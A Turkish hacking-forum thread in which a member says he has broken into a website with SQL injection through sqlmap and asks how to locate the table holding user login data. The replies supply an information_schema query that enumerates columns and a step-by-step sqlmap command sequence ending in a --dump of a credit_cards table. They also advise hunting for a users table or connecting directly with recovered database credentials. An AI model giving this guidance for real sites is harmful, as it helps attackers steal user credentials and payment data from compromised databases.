SQL Injection ile Kullanıcı Bilgilerine Nasıl Ulaşılır?

DDarkStyle

Katılımcı Üye
21 Eyl 2021
360
139
Dysnomia
SQL İnjection ile bir site hackledim sqlmap aracılıyla fakat karşımda çok tables var en azından kullanıcı bilgilerinin olduğu tablesi nasıl kolayca bulabilirim? Hepsine bakmam mı gerekiyor? Bir tablesin içine giriyorum orada farklı kolonlar var hepsine teker teker bakmam imkansız.
 
19 May 2020
238
84
SQL İnjection ile bir site hackledim sqlmap aracılıyla fakat karşımda çok tables var en azından kullanıcı bilgilerinin olduğu tablesi nasıl kolayca bulabilirim? Hepsine bakmam mı gerekiyor? Bir tablesin içine giriyorum orada farklı kolonlar var hepsine teker teker bakmam imkansız.
SQL:
select group_concat(column_name) from information_schema.columns where table_schema=database()
 
19 May 2020
238
84
Veya tüm dosyaları kaydedip SQL server management studio'da ya aktarıp oradan bu komudu çalıştırabilirmiyim? Çünkü sqlmapde bunu yapamıyoruz sanırım.
benim verdiğim örnek mysql için, kullanmak istediğin program mssql için. syntax hatası alırsın. workbench veya phpmyadmin kullanman gerekir. ayrıca komple veritabanını indirebiliyorsan aç sql dosyasını ve bir kod editöründe bakınıver.
 

Krypthon

Katılımcı Üye
21 Ağu 2021
796
754
Tien-Şan
Merhaba;

Database İsimlerine Ulaşmak İçin

Bu adımda ise sistemde var olan database isimlerine ulaşmak için komutumuzu biraz değiştirerek tekrar çalıştırıyoruz.

$ sqlmap - u ""hedef site"=user-info.php&username=yakup&password=&user-info-php-submit-button=View+Account+Detail" --dbs

Kullanımda Olan Güncel(Current) Veritabanı’na Ulaşmak İçin

$ sqlmap - u ""hedef site"
&username=yakup&password=&user-info-php-submit-button=View+Account+Details[/URL]" --current-db

Veritabanı Tablolarına Erişme

$ sqlmap - u ""hedef site"
&username=yakup&password=&user-info-php-submit-button=View+Account+Detail[/URL]" --tables -D owasp10

Column İsimlerine Ulaşma

$ sqlmap - u ""hedef site"
username=yakup&password=&user-info-php-submit-button=View+Account+Detail[/URL]" --columns -T credit_cards -D owasp10

Tüm Bilgilere Erişme

$ sqlmap - u ""hedef site"
&username=yakup&password=&user-info-php-submit-button=View+Account+Detail[/URL]" -T credit_cards -D owasp10 --dump
Son adımda ise ilgili komut yardımıyla tüm bilgilere ulaşmış olduk.

İyi Forumlar..
 

DDarkStyle

Katılımcı Üye
21 Eyl 2021
360
139
Dysnomia
Merhaba;

Database İsimlerine Ulaşmak İçin

Bu adımda ise sistemde var olan database isimlerine ulaşmak için komutumuzu biraz değiştirerek tekrar çalıştırıyoruz.

$ sqlmap - u ""hedef site"=user-info.php&username=yakup&password=&user-info-php-submit-button=View+Account+Detail" --dbs

Kullanımda Olan Güncel(Current) Veritabanı’na Ulaşmak İçin

$ sqlmap - u ""hedef site"
&username=yakup&password=&user-info-php-submit-button=View+Account+Details[/URL]" --current-db

Veritabanı Tablolarına Erişme

$ sqlmap - u ""hedef site"
&username=yakup&password=&user-info-php-submit-button=View+Account+Detail[/URL]" --tables -D owasp10

Column İsimlerine Ulaşma

$ sqlmap - u ""hedef site"
username=yakup&password=&user-info-php-submit-button=View+Account+Detail[/URL]" --columns -T credit_cards -D owasp10

Tüm Bilgilere Erişme

$ sqlmap - u ""hedef site"
&username=yakup&password=&user-info-php-submit-button=View+Account+Detail[/URL]" -T credit_cards -D owasp10 --dump
Son adımda ise ilgili komut yardımıyla tüm bilgilere ulaşmış olduk.

İyi Forumlar..
owasp10 dosyası mevcut değil fakat login sayfası olan bir site en azından giriş bilgilerinin olduğu farklı bir dosya yokmudur?
 

Kudad

Katılımcı Üye
14 Nis 2021
627
136
SQL İnjection ile bir site hackledim sqlmap aracılıyla fakat karşımda çok tables var en azından kullanıcı bilgilerinin olduğu tablesi nasıl kolayca bulabilirim? Hepsine bakmam mı gerekiyor? Bir tablesin içine giriyorum orada farklı kolonlar var hepsine teker teker bakmam imkansız.
users veri tabanı avrdır büyük ihtimalle yada sqlmap ile sql şifresi ve kullanıcı adını bulduktan sonra bağlanırsın veri tabanına kolay kolay bakarsın
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.